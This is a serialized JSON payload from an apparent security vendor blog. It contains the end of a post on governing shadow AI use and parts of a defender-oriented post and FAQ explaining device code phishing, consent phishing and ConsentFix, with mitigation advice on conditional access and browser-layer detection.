process.",[],{},{"nodeType":1041,"data":11293,"content":11297},{"target":11294},{"sys":11295},{"id":11296,"type":1046,"linkType":1047},"3ELxGNAa8YaVQR96IuWifj",[],{"nodeType":695,"data":11299,"content":11300},{},[11301],{"nodeType":699,"value":11302,"marks":11303,"data":11304},"Traditional DLP at the endpoint or network layer misses these paths. Network DLP and SWGs can't inspect clipboard pastes into AI prompts — there's no network event to intercept. Endpoint DLP sees file-system operations but not in-browser activity. ",[],{},{"nodeType":695,"data":11306,"content":11307},{},[11308],{"nodeType":699,"value":11309,"marks":11310,"data":11311},"Push's controls operate where the data is flowing — inside the browser session.",[],{},{"nodeType":721,"data":11313,"content":11314},{},[],{"nodeType":769,"data":11316,"content":11317},{},[11318],{"nodeType":699,"value":11319,"marks":11320,"data":11322},"How to keep up with AI tool sprawl",[11321],{"type":707},{},{"nodeType":695,"data":11324,"content":11325},{},[11326],{"nodeType":699,"value":11327,"marks":11328,"data":11329},"Pragmatically, the hardest part of generative AI security isn't the initial steps you take — it's keeping up with the sprawl. Point-in-time audits quickly become outdated when the landscape changes so quickly.",[],{},{"nodeType":695,"data":11331,"content":11332},{},[11333],{"nodeType":699,"value":11334,"marks":11335,"data":11336},"Push addresses this with continuous discovery, telemetry streams for the most important points of user interaction with AI apps, and controls that allow you to adapt quickly with simple configuration changes.",[],{},{"nodeType":695,"data":11338,"content":11339},{},[11340],{"nodeType":699,"value":11341,"marks":11342,"data":11343},"With automatic app categorization, if an employee starts using a new AI code assistant that didn't exist last quarter, Push discovers it, classifies it, and applies your governance rules — no manual intervention required.",[],{},{"nodeType":695,"data":11345,"content":11346},{},[11347],{"nodeType":699,"value":11348,"marks":11349,"data":11350},"All AI-related telemetry — app logins, file uploads and downloads, clipboard events, browser extensions, AI chat transcripts — can be sent as structured data to your SIEM.",[],{},{"nodeType":695,"data":11352,"content":11353},{},[11354],{"nodeType":699,"value":11355,"marks":11356,"data":11357},"This gives you all the information you need to track your progress, check your compliance status, and identify trends in AI usage and risk across your business as you make progress toward your goal, armed with the right data you didn't have before.",[],{},{"nodeType":695,"data":11359,"content":11360},{},[11361],{"nodeType":699,"value":11362,"marks":11363,"data":11364},"The goal isn't perfect control over every AI interaction. It's having enough visibility to make informed decisions and enough control to enforce them, without intensifying the shadow AI usage problem you set out to solve. Push can help you get there.",[],{},{"nodeType":721,"data":11366,"content":11367},{},[],{"nodeType":695,"data":11369,"content":11370},{},[11371],{"nodeType":699,"value":909,"marks":11372,"data":11373},[],{},{"nodeType":695,"data":11375,"content":11376},{},[11377],{"nodeType":699,"value":916,"marks":11378,"data":11379},[],{},{"nodeType":695,"data":11381,"content":11382},{},[11383,11386,11393],{"nodeType":699,"value":21,"marks":11384,"data":11385},[],{},{"nodeType":791,"data":11387,"content":11388},{"uri":927},[11389],{"nodeType":699,"value":930,"marks":11390,"data":11392},[11391],{"type":799},{},{"nodeType":699,"value":21,"marks":11394,"data":11395},[],{},"Shadow AI: how to discover, govern, and secure AI apps","Blocking AI tools doesn't stop employees from using AI — it stops you seeing how they use it. The solution: make the governed path easier than the workaround.","2026-08-13T00:00:00.000Z","shadow-ai-how-to-discover-govern-and-secure-ai-apps",{"items":11401},[11402,11406],{"sys":11403,"name":11405},{"id":11404},"3SA5H01UkKauuiTdt0KC6q","Shadow IT",{"sys":11407,"name":11409},{"id":11408},"7ohk9lIkxMvJMwnp2Lhuad","SaaS security",{"items":11411},[11412],{"fullName":11413,"firstName":11414,"jobTitle":2339,"profilePicture":11415},"Kelly Davenport","Kelly",{"url":11416},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F1hi8bEuVfn5sF57LivAq6d\u002F9a3b82426c697d765e2e450e33a18424\u002Fkelly_profile_pic.jpeg","blog\u002F6-browser-based-attacks-every-security-team-should-be-prepared-for",{"json":11419},{"data":11420,"content":11421,"nodeType":691},{},[11422],{"data":11423,"content":11424,"nodeType":695},{},[11425],{"data":11426,"marks":11427,"value":11428,"nodeType":699},{},[],"What security teams need to know about the browser-based attack techniques that are the leading cause of breaches today.",{"id":954,"publishedAt":11430},"2026-09-21T10:42:38.493Z",{"items":11432},[11433,11435],{"sys":11434,"name":1833},{"id":1832},{"sys":11436,"name":1837},{"id":1836},{"items":11438},[11439,11441,11446,11448,11450,11452,11454,11459,11461,11463,11468,11473,11478,11483,11485,11489,11493,11495,11497,11501,11503,11508,11513],{"sys":11440,"name":3708,"slug":3709,"tier":31},{"id":3707},{"sys":11442,"name":11444,"slug":11445,"tier":31},{"id":11443},"topic-identity-security","Identity security","identity-security",{"sys":11447,"name":2331,"slug":3684,"tier":31},{"id":3683},{"sys":11449,"name":245,"slug":3680,"tier":31},{"id":3679},{"sys":11451,"name":1837,"slug":3713,"tier":31},{"id":3712},{"sys":11453,"name":7852,"slug":7853,"tier":31},{"id":7851},{"sys":11455,"name":11457,"slug":11458,"tier":45},{"id":11456},"topic-aitm","AiTM phishing","aitm",{"sys":11460,"name":4727,"slug":7810,"tier":45},{"id":7809},{"sys":11462,"name":304,"slug":7843,"tier":45},{"id":7842},{"sys":11464,"name":11466,"slug":11467,"tier":45},{"id":11465},"topic-credential-phishing","Credential phishing","credential-phishing",{"sys":11469,"name":11471,"slug":11472,"tier":45},{"id":11470},"topic-mfa-bypass","MFA bypass","mfa-bypass",{"sys":11474,"name":11476,"slug":11477,"tier":45},{"id":11475},"topic-oauth-abuse","OAuth abuse","oauth-abuse",{"sys":11479,"name":11481,"slug":11482,"tier":45},{"id":11480},"topic-browser-extensions","Browser extensions","browser-extensions",{"sys":11484,"name":7816,"slug":7817,"tier":45},{"id":7815},{"sys":11486,"name":299,"slug":11488,"tier":45},{"id":11487},"topic-credential-stuffing","credential-stuffing",{"sys":11490,"name":289,"slug":11492,"tier":45},{"id":11491},"topic-ghost-logins","ghost-logins",{"sys":11494,"name":7838,"slug":7839,"tier":45},{"id":7837},{"sys":11496,"name":3693,"slug":3694,"tier":45},{"id":3692},{"sys":11498,"name":260,"slug":11500,"tier":45},{"id":11499},"topic-device-code-phishing","device-code-phishing",{"sys":11502,"name":3703,"slug":3704,"tier":45},{"id":3702},{"sys":11504,"name":11506,"slug":11507,"tier":45},{"id":11505},"topic-phaas","PhaaS","phaas",{"sys":11509,"name":11511,"slug":11512,"tier":45},{"id":11510},"topic-password-security","Password security","password-security",{"sys":11514,"name":11516,"slug":11517,"tier":45},{"id":11515},"topic-mfa","MFA","mfa","WP0f7w_PjN1dxUMq0MUg78fVVZlfQIUi_uwzIwAZT5U",{"id":11520,"title":10492,"authorsCollection":11521,"content":11527,"extension":942,"faqItemsCollection":12145,"faqTitle":12334,"featured":6,"hashTags":60,"meta":12335,"metaTitle":12336,"ogImage":60,"postType":5177,"publishedDate":10494,"relatedBlogPostsCollection":12337,"slug":10495,"stem":16988,"subtitle":60,"summary":16989,"synopsis":10493,"sys":17000,"tagsCollection":17002,"topicsCollection":17008,"__hash__":17032},"blog\u002Fblog\u002Fauthorization-phishing.json",{"items":11522},[11523],{"fullName":10505,"firstName":10506,"jobTitle":10507,"socialLinks":11524,"profilePicture":11526},[11525],"https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fluke-jennings-042b5619b\u002F",{"url":10509},{"json":11528,"links":12065},{"nodeType":691,"data":11529,"content":11530},{},[11531,11537,11543,11558,11574,11594,11618,11623,11626,11633,11639,11645,11650,11657,11667,11682,11687,11694,11722,11727,11733,11739,11746,11756,11772,11787,11790,11797,11803,11809,11816,11822,11835,11845,11855,11861,11871,11877,11883,11888,11895,11901,11907,11910,11917,11923,11929,11934,11953,11968,11983,11988,11991,11998,12008,12018,12028,12034,12041],{"nodeType":695,"data":11532,"content":11533},{},[11534],{"nodeType":699,"value":9868,"marks":11535,"data":11536},[],{},{"nodeType":695,"data":11538,"content":11539},{},[11540],{"nodeType":699,"value":9875,"marks":11541,"data":11542},[],{},{"nodeType":695,"data":11544,"content":11545},{},[11546,11549,11555],{"nodeType":699,"value":9882,"marks":11547,"data":11548},[],{},{"nodeType":791,"data":11550,"content":11551},{"uri":2995},[11552],{"nodeType":699,"value":1137,"marks":11553,"data":11554},[],{},{"nodeType":699,"value":9892,"marks":11556,"data":11557},[],{},{"nodeType":695,"data":11559,"content":11560},{},[11561,11564,11571],{"nodeType":699,"value":9899,"marks":11562,"data":11563},[],{},{"nodeType":791,"data":11565,"content":11566},{"uri":1355},[11567],{"nodeType":699,"value":2570,"marks":11568,"data":11570},[11569],{"type":799},{},{"nodeType":699,"value":9910,"marks":11572,"data":11573},[],{},{"nodeType":695,"data":11575,"content":11576},{},[11577,11580,11584,11587,11591],{"nodeType":699,"value":9917,"marks":11578,"data":11579},[],{},{"nodeType":699,"value":9921,"marks":11581,"data":11583},[11582],{"type":970},{},{"nodeType":699,"value":9926,"marks":11585,"data":11586},[],{},{"nodeType":699,"value":1305,"marks":11588,"data":11590},[11589],{"type":707},{},{"nodeType":699,"value":9934,"marks":11592,"data":11593},[],{},{"nodeType":695,"data":11595,"content":11596},{},[11597,11600,11606,11609,11615],{"nodeType":699,"value":9941,"marks":11598,"data":11599},[],{},{"nodeType":791,"data":11601,"content":11602},{"uri":1388},[11603],{"nodeType":699,"value":9948,"marks":11604,"data":11605},[],{},{"nodeType":699,"value":9952,"marks":11607,"data":11608},[],{},{"nodeType":791,"data":11610,"content":11611},{"uri":1400},[11612],{"nodeType":699,"value":1403,"marks":11613,"data":11614},[],{},{"nodeType":699,"value":9962,"marks":11616,"data":11617},[],{},{"nodeType":1041,"data":11619,"content":11622},{"target":11620},{"sys":11621},{"id":9969,"type":1046,"linkType":1047},[],{"nodeType":721,"data":11624,"content":11625},{},[],{"nodeType":725,"data":11627,"content":11628},{},[11629],{"nodeType":699,"value":9978,"marks":11630,"data":11632},[11631],{"type":707},{},{"nodeType":695,"data":11634,"content":11635},{},[11636],{"nodeType":699,"value":9986,"marks":11637,"data":11638},[],{},{"nodeType":695,"data":11640,"content":11641},{},[11642],{"nodeType":699,"value":9993,"marks":11643,"data":11644},[],{},{"nodeType":1041,"data":11646,"content":11649},{"target":11647},{"sys":11648},{"id":10000,"type":1046,"linkType":1047},[],{"nodeType":769,"data":11651,"content":11652},{},[11653],{"nodeType":699,"value":10006,"marks":11654,"data":11656},[11655],{"type":707},{},{"nodeType":695,"data":11658,"content":11659},{},[11660,11664],{"nodeType":699,"value":265,"marks":11661,"data":11663},[11662],{"type":707},{},{"nodeType":699,"value":10018,"marks":11665,"data":11666},[],{},{"nodeType":695,"data":11668,"content":11669},{},[11670,11673,11679],{"nodeType":699,"value":10025,"marks":11671,"data":11672},[],{},{"nodeType":791,"data":11674,"content":11675},{"uri":10030},[11676],{"nodeType":699,"value":10033,"marks":11677,"data":11678},[],{},{"nodeType":699,"value":10037,"marks":11680,"data":11681},[],{},{"nodeType":1041,"data":11683,"content":11686},{"target":11684},{"sys":11685},{"id":10044,"type":1046,"linkType":1047},[],{"nodeType":769,"data":11688,"content":11689},{},[11690],{"nodeType":699,"value":10050,"marks":11691,"data":11693},[11692],{"type":707},{},{"nodeType":695,"data":11695,"content":11696},{},[11697,11701,11704,11710,11713,11719],{"nodeType":699,"value":260,"marks":11698,"data":11700},[11699],{"type":707},{},{"nodeType":699,"value":10062,"marks":11702,"data":11703},[],{},{"nodeType":791,"data":11705,"content":11706},{"uri":2818},[11707],{"nodeType":699,"value":10069,"marks":11708,"data":11709},[],{},{"nodeType":699,"value":10073,"marks":11711,"data":11712},[],{},{"nodeType":791,"data":11714,"content":11715},{"uri":1030},[11716],{"nodeType":699,"value":10080,"marks":11717,"data":11718},[],{},{"nodeType":699,"value":10084,"marks":11720,"data":11721},[],{},{"nodeType":1041,"data":11723,"content":11726},{"target":11724},{"sys":11725},{"id":10091,"type":1046,"linkType":1047},[],{"nodeType":695,"data":11728,"content":11729},{},[11730],{"nodeType":699,"value":10097,"marks":11731,"data":11732},[],{},{"nodeType":695,"data":11734,"content":11735},{},[11736],{"nodeType":699,"value":10104,"marks":11737,"data":11738},[],{},{"nodeType":769,"data":11740,"content":11741},{},[11742],{"nodeType":699,"value":10111,"marks":11743,"data":11745},[11744],{"type":707},{},{"nodeType":695,"data":11747,"content":11748},{},[11749,11753],{"nodeType":699,"value":1378,"marks":11750,"data":11752},[11751],{"type":707},{},{"nodeType":699,"value":10123,"marks":11754,"data":11755},[],{},{"nodeType":695,"data":11757,"content":11758},{},[11759,11762,11769],{"nodeType":699,"value":21,"marks":11760,"data":11761},[],{},{"nodeType":791,"data":11763,"content":11764},{"uri":1388},[11765],{"nodeType":699,"value":10136,"marks":11766,"data":11768},[11767],{"type":799},{},{"nodeType":699,"value":10141,"marks":11770,"data":11771},[],{},{"nodeType":695,"data":11773,"content":11774},{},[11775,11778,11784],{"nodeType":699,"value":10148,"marks":11776,"data":11777},[],{},{"nodeType":791,"data":11779,"content":11780},{"uri":1400},[11781],{"nodeType":699,"value":10155,"marks":11782,"data":11783},[],{},{"nodeType":699,"value":10159,"marks":11785,"data":11786},[],{},{"nodeType":721,"data":11788,"content":11789},{},[],{"nodeType":725,"data":11791,"content":11792},{},[11793],{"nodeType":699,"value":10169,"marks":11794,"data":11796},[11795],{"type":707},{},{"nodeType":695,"data":11798,"content":11799},{},[11800],{"nodeType":699,"value":10177,"marks":11801,"data":11802},[],{},{"nodeType":695,"data":11804,"content":11805},{},[11806],{"nodeType":699,"value":10184,"marks":11807,"data":11808},[],{},{"nodeType":769,"data":11810,"content":11811},{},[11812],{"nodeType":699,"value":10191,"marks":11813,"data":11815},[11814],{"type":707},{},{"nodeType":695,"data":11817,"content":11818},{},[11819],{"nodeType":699,"value":10199,"marks":11820,"data":11821},[],{},{"nodeType":695,"data":11823,"content":11824},{},[11825,11828,11832],{"nodeType":699,"value":10206,"marks":11826,"data":11827},[],{},{"nodeType":699,"value":10210,"marks":11829,"data":11831},[11830],{"type":707},{},{"nodeType":699,"value":10215,"marks":11833,"data":11834},[],{},{"nodeType":695,"data":11836,"content":11837},{},[11838,11842],{"nodeType":699,"value":10222,"marks":11839,"data":11841},[11840],{"type":707},{},{"nodeType":699,"value":10227,"marks":11843,"data":11844},[],{},{"nodeType":695,"data":11846,"content":11847},{},[11848,11852],{"nodeType":699,"value":10234,"marks":11849,"data":11851},[11850],{"type":707},{},{"nodeType":699,"value":10239,"marks":11853,"data":11854},[],{},{"nodeType":695,"data":11856,"content":11857},{},[11858],{"nodeType":699,"value":10246,"marks":11859,"data":11860},[],{},{"nodeType":695,"data":11862,"content":11863},{},[11864,11868],{"nodeType":699,"value":10253,"marks":11865,"data":11867},[11866],{"type":707},{},{"nodeType":699,"value":10258,"marks":11869,"data":11870},[],{},{"nodeType":695,"data":11872,"content":11873},{},[11874],{"nodeType":699,"value":10265,"marks":11875,"data":11876},[],{},{"nodeType":695,"data":11878,"content":11879},{},[11880],{"nodeType":699,"value":10272,"marks":11881,"data":11882},[],{},{"nodeType":1041,"data":11884,"content":11887},{"target":11885},{"sys":11886},{"id":10279,"type":1046,"linkType":1047},[],{"nodeType":769,"data":11889,"content":11890},{},[11891],{"nodeType":699,"value":10285,"marks":11892,"data":11894},[11893],{"type":707},{},{"nodeType":695,"data":11896,"content":11897},{},[11898],{"nodeType":699,"value":10293,"marks":11899,"data":11900},[],{},{"nodeType":695,"data":11902,"content":11903},{},[11904],{"nodeType":699,"value":10300,"marks":11905,"data":11906},[],{},{"nodeType":721,"data":11908,"content":11909},{},[],{"nodeType":725,"data":11911,"content":11912},{},[11913],{"nodeType":699,"value":10310,"marks":11914,"data":11916},[11915],{"type":707},{},{"nodeType":695,"data":11918,"content":11919},{},[11920],{"nodeType":699,"value":10318,"marks":11921,"data":11922},[],{},{"nodeType":695,"data":11924,"content":11925},{},[11926],{"nodeType":699,"value":10325,"marks":11927,"data":11928},[],{},{"nodeType":1041,"data":11930,"content":11933},{"target":11931},{"sys":11932},{"id":10332,"type":1046,"linkType":1047},[],{"nodeType":695,"data":11935,"content":11936},{},[11937,11941,11944,11950],{"nodeType":699,"value":10338,"marks":11938,"data":11940},[11939],{"type":707},{},{"nodeType":699,"value":10343,"marks":11942,"data":11943},[],{},{"nodeType":791,"data":11945,"content":11946},{"uri":10348},[11947],{"nodeType":699,"value":10351,"marks":11948,"data":11949},[],{},{"nodeType":699,"value":10355,"marks":11951,"data":11952},[],{},{"nodeType":695,"data":11954,"content":11955},{},[11956,11959,11965],{"nodeType":699,"value":4447,"marks":11957,"data":11958},[],{},{"nodeType":791,"data":11960,"content":11961},{"uri":1332},[11962],{"nodeType":699,"value":10368,"marks":11963,"data":11964},[],{},{"nodeType":699,"value":10372,"marks":11966,"data":11967},[],{},{"nodeType":695,"data":11969,"content":11970},{},[11971,11974,11980],{"nodeType":699,"value":10379,"marks":11972,"data":11973},[],{},{"nodeType":791,"data":11975,"content":11976},{"uri":1332},[11977],{"nodeType":699,"value":10386,"marks":11978,"data":11979},[],{},{"nodeType":699,"value":10390,"marks":11981,"data":11982},[],{},{"nodeType":1041,"data":11984,"content":11987},{"target":11985},{"sys":11986},{"id":10397,"type":1046,"linkType":1047},[],{"nodeType":721,"data":11989,"content":11990},{},[],{"nodeType":725,"data":11992,"content":11993},{},[11994],{"nodeType":699,"value":10406,"marks":11995,"data":11997},[11996],{"type":707},{},{"nodeType":695,"data":11999,"content":12000},{},[12001,12005],{"nodeType":699,"value":10414,"marks":12002,"data":12004},[12003],{"type":707},{},{"nodeType":699,"value":10419,"marks":12006,"data":12007},[],{},{"nodeType":695,"data":12009,"content":12010},{},[12011,12015],{"nodeType":699,"value":10426,"marks":12012,"data":12014},[12013],{"type":707},{},{"nodeType":699,"value":10431,"marks":12016,"data":12017},[],{},{"nodeType":695,"data":12019,"content":12020},{},[12021,12025],{"nodeType":699,"value":10438,"marks":12022,"data":12024},[12023],{"type":707},{},{"nodeType":699,"value":10443,"marks":12026,"data":12027},[],{},{"nodeType":695,"data":12029,"content":12030},{},[12031],{"nodeType":699,"value":10450,"marks":12032,"data":12033},[],{},{"nodeType":769,"data":12035,"content":12036},{},[12037],{"nodeType":699,"value":10457,"marks":12038,"data":12040},[12039],{"type":707},{},{"nodeType":695,"data":12042,"content":12043},{},[12044,12047,12053,12056,12062],{"nodeType":699,"value":10465,"marks":12045,"data":12046},[],{},{"nodeType":791,"data":12048,"content":12049},{"uri":10470},[12050],{"nodeType":699,"value":10473,"marks":12051,"data":12052},[],{},{"nodeType":699,"value":10477,"marks":12054,"data":12055},[],{},{"nodeType":791,"data":12057,"content":12058},{"uri":10482},[12059],{"nodeType":699,"value":10485,"marks":12060,"data":12061},[],{},{"nodeType":699,"value":10489,"marks":12063,"data":12064},[],{},{"entries":12066},{"hyperlink":12067,"inline":12068,"block":12069},[],[],[12070,12084,12110,12124,12128,12135,12139],{"sys":12071,"__typename":4990,"content":12072,"name":12083,"title":60},{"id":9969},{"json":12073},{"nodeType":691,"data":12074,"content":12075},{},[12076],{"nodeType":695,"data":12077,"content":12078},{},[12079],{"nodeType":699,"value":12080,"marks":12081,"data":12082},"In this blog post, we’ll talk about the different authorization attacks used by attackers in the wild and what this means for security teams looking to detect and block these attacks.",[],{},"Authorization phishing IB2",{"sys":12085,"__typename":4990,"content":12086,"name":12109,"title":60},{"id":10000},{"json":12087},{"data":12088,"content":12089,"nodeType":691},{},[12090],{"data":12091,"content":12092,"nodeType":695},{},[12093,12097,12105],{"data":12094,"marks":12095,"value":12096,"nodeType":699},{},[],"Three techniques currently fall under the authorization phishing umbrella. Most of them are exactly new, either — Push cataloged consent phishing and device code phishing in the ",{"data":12098,"content":12100,"nodeType":791},{"uri":12099},"https:\u002F\u002Fpushsecurity.com\u002Fresources\u002Fbrowser-identity-attacks-matrix",[12101],{"data":12102,"marks":12103,"value":12104,"nodeType":699},{},[],"Browser & Identity Attacks Matrix",{"data":12106,"marks":12107,"value":12108,"nodeType":699},{},[]," back in 2023. What's changed in 2026 is that they've moved from isolated, targeted operations to widespread adoption across the phishing-as-a-service ecosystem.","Authorization phishing IB1",{"sys":12111,"__typename":4990,"content":12112,"name":12123,"title":60},{"id":10044},{"json":12113},{"nodeType":691,"data":12114,"content":12115},{},[12116],{"nodeType":695,"data":12117,"content":12118},{},[12119],{"nodeType":699,"value":12120,"marks":12121,"data":12122},"And even if you can get in, once a malicious app is flagged, it's burned — and unlike domains and IP addresses, it's not easy to rotate. The vendor can ban the app, ban the entire tenant associated with it, and block the attacker's registration infrastructure. Setting up new apps at scale requires new verified tenants, which makes the economics of consent phishing significantly worse than other techniques. These controls are the main reason we don't see it much in the wild anymore.",[],{},"Authorization phishing IB3",{"sys":12125,"__typename":5108,"title":12126,"arcadeDemoUrl":12127,"playText":5111},{"id":10091},"Device code phishing: In the wild examples","https:\u002F\u002Fdemo.arcade.software\u002FFx5XuPm0JCceQRgAvH9C?embed",{"sys":12129,"__typename":4982,"title":12130,"caption":12130,"layoutMode":60,"file":12131},{"id":10279},"Native client warning displayed for ConsentFix attacks requesting certain scope and app combinations. ",{"url":12132,"width":12133,"height":12134},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F3bV6Kt6BQqseSGPRmNeqYT\u002Fe93466e14eeb45fb9d07fa135d6b80e4\u002Fnativeclient_warning.png",1278,987,{"sys":12136,"__typename":5108,"title":12137,"arcadeDemoUrl":12138,"playText":5111},{"id":10332},"Device Code Phishing Demo: GitHub","https:\u002F\u002Fdemo.arcade.software\u002F8WVq7zlbQYahwpDLs6ly?embed",{"sys":12140,"__typename":4982,"title":12141,"caption":12141,"layoutMode":60,"file":12142},{"id":10397},"\"Invite accepted\" confirmation page for the poisoned OpenAI tenant.",{"url":12143,"width":4986,"height":12144},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F38N7FnCMSQz519ZXQfpXo4\u002Ff848d30b238b943a47efa29d12b68b87\u002Fimage5.png",1031,{"items":12146},[12147,12160,12173,12186,12199,12212,12225,12259,12293],{"answer":12148,"question":12159},{"json":12149},{"nodeType":691,"data":12150,"content":12151},{},[12152],{"nodeType":695,"data":12153,"content":12154},{},[12155],{"nodeType":699,"value":12156,"marks":12157,"data":12158},"Authorization phishing is a category of phishing attacks that target OAuth authorization flows rather than the authentication (login) process. Instead of stealing credentials or session tokens, authorization phishing tricks users into granting attacker-controlled applications access to their accounts through legitimate OAuth consent prompts or device code flows. The user authenticates normally — on the real identity provider, with their real credentials and MFA — and the attack exploits the authorization decision that follows.",[],{},"What is authorization phishing?",{"answer":12161,"question":12172},{"json":12162},{"nodeType":691,"data":12163,"content":12164},{},[12165],{"nodeType":695,"data":12166,"content":12167},{},[12168],{"nodeType":699,"value":12169,"marks":12170,"data":12171},"Authentication phishing attacks the login — the moment a user proves their identity. Techniques like AiTM (adversary-in-the-middle) phishing use reverse-proxy kits to intercept credentials and session tokens during the authentication flow. Authorization phishing attacks what happens after the login. The user authenticates legitimately, and the attacker abuses OAuth mechanisms (consent grants, device code flows, token exchanges) to obtain access tokens. The key difference: authentication phishing defeats MFA by proxying the login and intercepting the session token, while authorization phishing makes MFA irrelevant because the authentication succeeds normally.",[],{},"What's the difference between authentication phishing and authorization phishing?",{"answer":12174,"question":12185},{"json":12175},{"nodeType":691,"data":12176,"content":12177},{},[12178],{"nodeType":695,"data":12179,"content":12180},{},[12181],{"nodeType":699,"value":12182,"marks":12183,"data":12184},"No. All forms of MFA — including passkeys, FIDO2 keys, authenticator apps, and SMS codes — protect the authentication flow. Authorization phishing targets the authorization layer, which operates after authentication has already succeeded. The user completes MFA normally, and the attack exploits the subsequent OAuth consent or device code flow. Passkeys remain the strongest defense against authentication phishing (AiTM, credential theft), but they don't address authorization-layer attacks.",[],{},"Can MFA and passkeys stop authorization phishing?",{"answer":12187,"question":12198},{"json":12188},{"nodeType":691,"data":12189,"content":12190},{},[12191],{"nodeType":695,"data":12192,"content":12193},{},[12194],{"nodeType":699,"value":12195,"marks":12196,"data":12197},"Some conditional access policies can block device code phishing, but effectiveness is highly configuration-dependent. \"Block device code flow\" is effective but also blocks legitimate use cases. \"Require compliant device\" blocks device code phishing because the flow can't present device compliance proofs, but doesn't stop ConsentFix. \"Token protection\" (currently in preview) has limited applicability. \"Require phishing-resistant authentication\" is not applicable because the authentication in device code phishing is already legitimate. The gap between a default conditional access deployment and a hardened one is significant.",[],{},"Can conditional access policies stop device code phishing?",{"answer":12200,"question":12211},{"json":12201},{"nodeType":691,"data":12202,"content":12203},{},[12204],{"nodeType":695,"data":12205,"content":12206},{},[12207],{"nodeType":699,"value":12208,"marks":12209,"data":12210},"ConsentFix is harder to block with conditional access because it uses the standard authorization code grant flow rather than the device code flow. \"Block device code flow\" doesn't apply. \"Require compliant device\" doesn't stop ConsentFix. \"Token protection\" mitigates some ConsentFix scenarios depending on scopes requested, but it's in preview and limited in scope. Microsoft appears to be reducing the ConsentFix attack surface by locking down apps and reply URLs, but there is currently no single conditional access policy that reliably blocks all ConsentFix variants.",[],{},"Can conditional access policies stop ConsentFix?",{"answer":12213,"question":12224},{"json":12214},{"nodeType":691,"data":12215,"content":12216},{},[12217],{"nodeType":695,"data":12218,"content":12219},{},[12220],{"nodeType":699,"value":12221,"marks":12222,"data":12223},"Authorization phishing detection requires visibility at the browser layer, where the OAuth consent and device code flows actually execute. This includes monitoring device code authorization pages for suspicious activity, capturing OAuth consent flows (client ID, scopes requested, authorization server, outcome), and detecting browser-native attacks like ConsentFix that combine clipboard injection with OAuth abuse. Network-layer and endpoint-layer tools don't have visibility into these browser-rendered authorization flows.",[],{},"How do you detect authorization phishing?",{"answer":12226,"question":12258},{"json":12227},{"nodeType":691,"data":12228,"content":12229},{},[12230,12237,12244,12251],{"nodeType":695,"data":12231,"content":12232},{},[12233],{"nodeType":699,"value":12234,"marks":12235,"data":12236},"No. Email gateways won't catch it — a device code phishing lure asks the user to visit a legitimate URL (like microsoft.com\u002Fdevicelogin) and enter a code. There's no malicious link, no credential-harvesting page, and no suspicious attachment for the gateway to flag. The pages and infrastructure used as part of these campaigns are frequently rotated to evade blocklists. ",[],{},{"nodeType":695,"data":12238,"content":12239},{},[12240],{"nodeType":699,"value":12241,"marks":12242,"data":12243},"SWGs inspect network traffic and enforce access policies, but the authorization flow happens on the real identity provider's domain over a legitimate connection — indistinguishable from a normal sign-in. ",[],{},{"nodeType":695,"data":12245,"content":12246},{},[12247],{"nodeType":699,"value":12248,"marks":12249,"data":12250},"EDR won't see it either, because the entire attack plays out in the browser via standard web requests — no malicious payload touches the filesystem or triggers OS-level detection. These tools are built to detect authentication phishing — malicious URLs, cloned login pages, known-bad infrastructure — and authorization phishing doesn't produce any of those artifacts. ",[],{},{"nodeType":695,"data":12252,"content":12253},{},[12254],{"nodeType":699,"value":12255,"marks":12256,"data":12257},"Browser-layer detection closes the gap, because it has visibility into the authorization flow itself, tab metadata, and page context that makes bad activity identifiable from normal behavior.",[],{},"Can I detect authorization attacks with my email gateway, SWG, or EDR?",{"answer":12260,"question":12292},{"json":12261},{"nodeType":691,"data":12262,"content":12263},{},[12264,12271,12278,12285],{"nodeType":695,"data":12265,"content":12266},{},[12267],{"nodeType":699,"value":12268,"marks":12269,"data":12270},"Yes, in Microsoft environments. Entra ID conditional access includes a \"block device code flow\" policy that prevents device code authorizations outright, and Microsoft now recommends enabling it for any tenant that hasn't used the flow in the past 25 days. ",[],{},{"nodeType":695,"data":12272,"content":12273},{},[12274],{"nodeType":699,"value":12275,"marks":12276,"data":12277},"The main operational cost is that Azure CLI, developer tooling, and conference room hardware often depend on device code flow, so developer-heavy organizations may need exclusions that increase susceptibility to this technique. ",[],{},{"nodeType":695,"data":12279,"content":12280},{},[12281],{"nodeType":699,"value":12282,"marks":12283,"data":12284},"\"Require compliant device\" also blocks device code phishing indirectly, since the flow can't present the TPM-bound proof that compliance requires. Two important caveats: blocking device code flow doesn't block ConsentFix or other authorization code grant attacks, so it's a partial solution to the broader authorization phishing category. ",[],{},{"nodeType":695,"data":12286,"content":12287},{},[12288],{"nodeType":699,"value":12289,"marks":12290,"data":12291},"Outside Microsoft, options are more limited — Google mitigates the risk by restricting which scopes are available through device code, but GitHub and other platforms that support the flow don't offer equivalent blocking controls, leaving you reliant on monitoring and detection rather than prevention.",[],{},"Can you block device code phishing?",{"answer":12294,"question":12333},{"json":12295},{"nodeType":691,"data":12296,"content":12297},{},[12298,12305,12312,12319,12326],{"nodeType":695,"data":12299,"content":12300},{},[12301],{"nodeType":699,"value":12302,"marks":12303,"data":12304},"The attack isn't Microsoft-exclusive, but the exposure varies across different platforms. Microsoft has the broadest exposure because of unrestricted scopes, reusable first-party client IDs, and FOCI token exchange. This, combined with the prevalence of Microsoft, is why the overwhelming majority of observed attacks target Entra ID.",[],{},{"nodeType":695,"data":12306,"content":12307},{},[12308],{"nodeType":699,"value":12309,"marks":12310,"data":12311},"GitHub is also an obvious target: device code flow is the default CLI sign-in method, and broad scopes including full repository access are available, though the attacker must control their own OAuth app and the victim sees an explicit consent screen. ",[],{},{"nodeType":695,"data":12313,"content":12314},{},[12315],{"nodeType":699,"value":12316,"marks":12317,"data":12318},"Google is lower risk for device code phishing specifically — Google explicitly limits which scopes are accessible through the device code flow, making Gmail, Calendar, and most Workspace APIs unavailable through this mechanism. ",[],{},{"nodeType":695,"data":12320,"content":12321},{},[12322],{"nodeType":699,"value":12323,"marks":12324,"data":12325},"Salesforce and AWS also support the flow. However Salesforce implemented changes to app approvals and permissions following the large-scale campaign in 2025 to reduce the scope for abuse in future.",[],{},{"nodeType":695,"data":12327,"content":12328},{},[12329],{"nodeType":699,"value":12330,"marks":12331,"data":12332},"If your environment relies on any platform that supports OAuth device authorization grants or authorization code grants with localhost redirect URIs, the attack surface exists.",[],{},"We're not a Microsoft shop — do we still need 